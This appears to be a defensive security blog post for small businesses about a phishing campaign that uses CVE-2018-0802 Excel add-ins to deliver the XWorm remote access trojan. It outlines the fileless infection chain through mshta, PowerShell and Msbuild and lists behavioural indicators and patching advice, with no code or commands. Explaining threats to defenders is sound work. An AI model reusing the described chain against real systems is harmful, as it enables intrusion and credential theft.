XWorm RAT Campaign: How a 2018 Excel Vulnerability Is Still Compromising Businesses in 2026

By /

A 2018 Excel Vulnerability Is Still Being Used to Hack Businesses in 2026

Let that sink in.

A vulnerability patched years ago is actively being used in a new phishing campaign to deploy the XWorm Remote Access Trojan (RAT). And it’s working.

If you think “old vulnerabilities” aren’t your problem anymore, this campaign proves otherwise.

What Is XWorm?

XWorm is a multi-functional .NET-based Remote Access Trojan first seen in 2022. It’s widely traded in cybercrime marketplaces because it’s:

  • Modular

  • Easy to deploy

  • Highly customizable

  • Packed with plugins

Once installed, attackers gain:

  • Full remote control of the system

  • Keylogging

  • Browser credential theft

  • Clipboard monitoring

  • File access and exfiltration

  • DDoS capabilities

  • Remote shell execution

In short: complete compromise.

How This New Attack Works

This campaign begins with phishing emails disguised as:

  • Payment confirmations

  • Purchase orders

  • Signed banking documents

  • Shipping paperwork

The attachment? A malicious Excel add-in file (.XLAM).

When opened, the file exploits CVE-2018-0802, a memory corruption flaw in the legacy Microsoft Equation Editor component.

Yes. Equation Editor.

Here’s the execution chain in simplified form:

  1. Excel file loads a malicious OLE object

  2. Exploit triggers remote code execution

  3. Shellcode downloads a malicious HTA file

  4. mshta.exe executes obfuscated script

  5. PowerShell decodes and loads payload

  6. Malware is injected into Msbuild.exe (a legitimate Windows process)

  7. XWorm establishes encrypted command-and-control communication

The malware never writes the final payload to disk.

It runs fileless.

That makes traditional antivirus detection significantly harder.

Why This Matters for Small Businesses

This campaign highlights three uncomfortable truths:

1. Old vulnerabilities never really die

CVE-2018-0802 is still on CISA’s Known Exploited Vulnerabilities list.

If systems are not fully patched, attackers will absolutely use it.

2. Fileless malware is the new normal

Threat actors abuse legitimate tools like:

  • mshta.exe

  • PowerShell

  • Msbuild.exe

These are trusted Windows components.

If you’re not monitoring behavior, you won’t see it.

3. Phishing remains the #1 entry point

All it takes is one employee opening one Excel file.

That’s it.

Indicators of Compromise to Watch For

Security teams should monitor for:

  • Office spawning mshta.exe

  • Excel launching PowerShell

  • Msbuild.exe running unexpectedly

  • Suspicious outbound AES-encrypted traffic

  • Unusual process chains

Behavioral detection matters more than signature-based scanning.

How to Protect Your Business

Here’s the non-negotiable baseline:

  • Patch all Office components, including legacy Equation Editor components

  • Disable or restrict OLE and macro execution

  • Restrict HTA file execution

  • Enable PowerShell logging

  • Deploy behavior-based endpoint detection

  • Monitor outbound encrypted traffic anomalies

Security in 2026 is not about installing antivirus and hoping.

It’s about layered defense.

Final Thought

Attackers are not relying on brand-new zero-days.

They’re using old, known, preventable vulnerabilities combined with smart evasion techniques.

If your systems aren’t patched…
If your endpoint protection isn’t behavior-based…
If your users aren’t trained…

You’re not unlucky when you get breached.

You’re predictable.

And predictable businesses are profitable targets.

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top